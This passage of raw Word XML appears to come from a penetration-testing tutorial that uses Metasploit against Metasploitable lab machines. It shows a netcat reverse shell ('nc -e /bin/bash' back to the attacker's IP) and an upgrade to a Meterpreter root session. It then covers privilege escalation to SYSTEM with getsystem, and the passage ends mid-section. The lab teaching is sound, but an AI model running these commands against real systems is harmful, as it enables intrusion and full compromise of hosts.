    <w:p w14:paraId="7D9F339A" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.21.10:1337 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B8C29" w14:textId="3037B0E5" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">[*] Command shell session 9 opened (192.168.21.10:1337 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="006A4C76">
        <w:t>:48023) at 2018-07-03 10:10:29 -0500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EABC2" w14:textId="77777777" w:rsidR="007F2284" w:rsidRDefault="007F2284" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078CEC6C" w14:textId="6A1CC356" w:rsidR="006A4C76" w:rsidRPr="001725B8" w:rsidRDefault="006A4C76" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001725B8">
        <w:t>In another shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44569173" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4816B4AE" w14:textId="41B7F08C" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">root@kali:~# nc </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve"> 1524</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E5120" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>root@metasploitable:/# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B1143" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717232F8" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82B323" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRPr="00B616D6" w:rsidRDefault="00B70BCA" w:rsidP="00B70BCA">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B616D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>[…snip…]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37479AFA" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51113D57" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>root@metasploitable:/# nc -e /bin/bash 192.168.21.10 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A67F6F4" w14:textId="277CAFBF" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="001725B8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then, the goal is to upgrade this shell to a </w:t>
      </w:r>
      <w:r w:rsidR="00041537">
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>eterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B93517" w14:textId="6060A376" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="001725B8">
        <w:t xml:space="preserve">sf exploit(multi/handler) &gt; use </w:t>
      </w:r>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">post/multi/manage/shell_to_meterpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21366629" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf post(multi/manage/shell_to_meterpreter) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF9EC37" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E7D219" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Module options (post/multi/manage/shell_to_meterpreter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C73D3F0" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22966346" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B3A09" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E61A7" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41154392" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   LHOST    192.168.21.10    no        IP of host that will receive the connection from the payload (Will try to auto detect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CE1446" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   LPORT    4433             yes       Port for payload to connect to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECB245" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   SESSION  1                yes       The session to run this module on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7FF008" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D28637D" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf post(multi/manage/shell_to_meterpreter) &gt; set session 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617D5A32" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>session =&gt; 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA1B50" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf post(multi/manage/shell_to_meterpreter) &gt; set LPORT 4460</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F69C29" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>LPORT =&gt; 4460</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D1B167" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:lastRenderedPageBreak/>
        <w:t>msf post(multi/manage/shell_to_meterpreter) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F9476" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3F36C0" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>[*] Upgrading session ID: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66245351" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>[*] Starting exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D361A" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.21.10:4460 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C313799" w14:textId="71CFD556" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">[*] Sending stage (861480 bytes) to </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272EAC3E" w14:textId="7E065071" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">[*] Meterpreter session 10 opened (192.168.21.10:4460 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="006A4C76">
        <w:t>:50128) at 2018-07-03 10:11:57 -0500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492A130" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>[*] Command stager progress: 100.00% (773/773 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E8009" w14:textId="3114E485" w:rsidR="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>[*] Post module execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8488AA" w14:textId="77777777" w:rsidR="007F2284" w:rsidRDefault="007F2284" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098F8A7A" w14:textId="4B15D476" w:rsidR="001725B8" w:rsidRPr="001725B8" w:rsidRDefault="001725B8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>If the exploit successfully completed, a new Meterpreter session is available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C2ABB1" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf post(multi/manage/shell_to_meterpreter) &gt; sessions -i 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674177A5" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>[*] Starting interaction with 10...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597E6AE" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F799713" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A58307" w14:textId="4BE6F9A1" w:rsidR="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Server username: uid=0, gid=0, euid=0, egid=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770364C2" w14:textId="77777777" w:rsidR="00E93E8D" w:rsidRPr="00E93E8D" w:rsidRDefault="00E93E8D" w:rsidP="00E93E8D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06A07631" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2F6B0" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Computer     : metasploitable.localdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221EA351" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C2B0D" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Architecture : i686</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBC5649" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>BuildTuple   : i486-linux-musl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046E9B6" w14:textId="732139F4" w:rsidR="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Meterpreter  : x86/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB94A43" w14:textId="77777777" w:rsidR="00E93E8D" w:rsidRPr="00E93E8D" w:rsidRDefault="00E93E8D" w:rsidP="00E93E8D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557408E9" w14:textId="4B80D7FD" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E99808" w14:textId="138BFF30" w:rsidR="001D3C10" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC98330" w14:textId="062B21E5" w:rsidR="001F742A" w:rsidRPr="001F742A" w:rsidRDefault="00047E27" w:rsidP="001F742A">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When attacker gain access to a system, they are more likely to have limited rights. </w:t>
      </w:r>
      <w:r w:rsidR="009A1C86">
        <w:t>Privilege escalation is a type of attack used to gain elevated access to a network and its data and applications. It takes advantages of misconfigurations, programming errors or design flaw.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF1AE2" w14:textId="08D8FB8C" w:rsidR="00F41E0F" w:rsidRDefault="00D94416" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B5CA3" w14:textId="3A529DF8" w:rsidR="00047E27" w:rsidRDefault="00047E27" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Meterpreter has a “getsystem” command that </w:t>
      </w:r>
      <w:r w:rsidR="004E145F">
        <w:t>magically elevates from a local administrator to the SYSTEM user.</w:t>
      </w:r>
      <w:r w:rsidR="00903ACB">
        <w:t xml:space="preserve"> To do so, it uses three different techniques: the first two rely on named pipe impersonation and the last one relies on token duplication.</w:t>
      </w:r>
      <w:r w:rsidR="002A5721">
        <w:t xml:space="preserve"> Be aware that the second techniques drops a DLL on the </w:t>
      </w:r>
      <w:r w:rsidR="000E5492">
        <w:t>disk, which</w:t>
      </w:r>
      <w:r w:rsidR="002A5721">
        <w:t xml:space="preserve"> can trigger anti-virus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42151D8B" w14:textId="3395DE6A" w:rsidR="002A5721" w:rsidRDefault="002A5721" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The third techniques requires </w:t>
      </w:r>
      <w:r w:rsidR="00E91111">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>SeDebugPrivileges</w:t>
      </w:r>
      <w:r w:rsidR="00E91111">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (which </w:t>
      </w:r>
      <w:r w:rsidR="00817CFD">
        <w:t>might</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> be obtained using “getprivs” command).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A93D793" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C1F580" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDE2565" w14:textId="71EE4DC5" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Computer        : METASPLOITABLE3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164781B" w14:textId="442CCD55" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>OS              : Windows 2008 R2 (Build 7601, Service Pack 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66607CD2" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Architecture    : x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342E356A" w14:textId="76235DC1" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>System Language : en_US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F6C29" w14:textId="51F0EB89" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain          : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AFEBC2" w14:textId="5CD8DFDE" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logged On Users : 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F44805" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter     : x86/windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60934948" w14:textId="0D685390" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E113E75" w14:textId="128190FC" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B07CA2" w14:textId="68E83416" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server username: METASPLOITABLE3\h4cker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA58BF" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183D6881" w14:textId="73B2F6D8" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DEE40D" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDF74C4" w14:textId="77777777" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599F28D8" w14:textId="432F2CA5" w:rsidR="00D16772" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35882DFD" w14:textId="49EEBFE5" w:rsidR="00D16772" w:rsidRPr="001D3C10" w:rsidRDefault="00D16772" w:rsidP="00D16772">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server username: NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D2BD1" w14:textId="12F877A6" w:rsidR="00F41E0F" w:rsidRDefault="00F41E0F" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Local exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D64DB" w14:textId="7A3AA34E" w:rsidR="00A9613A" w:rsidRDefault="00921E81" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Local exploits are run on the machine by the attacker once he has a shell on the machine. Those scripts exploit vulnerabilities or misconfigurations to gain elevated privileges. Common vulnerabilities are SUID or buffer</w:t>
      </w:r>
      <w:r w:rsidR="00A9613A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6112DA05" w14:textId="448F9453" w:rsidR="00894845" w:rsidRPr="00894845" w:rsidRDefault="00A9613A" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit “local_exploit_suggester” module suggests exploit for a given target.</w:t>
